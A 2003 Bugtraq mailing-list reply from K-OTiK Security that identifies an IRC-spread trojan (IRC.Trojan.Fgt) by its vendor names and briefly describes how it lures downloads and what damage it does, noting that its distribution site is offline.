Date: 28 Oct 2003 08:59:58 -0000
From: K-OTiK Security <Special-Alerts@...tik.com>
To: bugtraq@...urityfocus.com
Subject: Re: a dangerous fast spreading (yet simple) trojan horse (Now
    IRC.Trojan.Fgt)

This trojan is now identified :

IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure]
Type:  Trojan Horse
Infection Length:  156,672 bytes

IRC.Trojan.Fgt is a downloaded file that disables firewall and security software,it works by sending messages via IRC chat, trying to get people to click on a web link, which would download "britney.jpg" from www.angelfire.com. It deletes critical system files and changes the Internet Explorer home page to a pornographic page.

The website which was responsible for distributing this threat is no longer available. So the worm doesn't work any more (this version).

More : http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html

Regards.
K-OTik Staff /// http://www.k-otik.com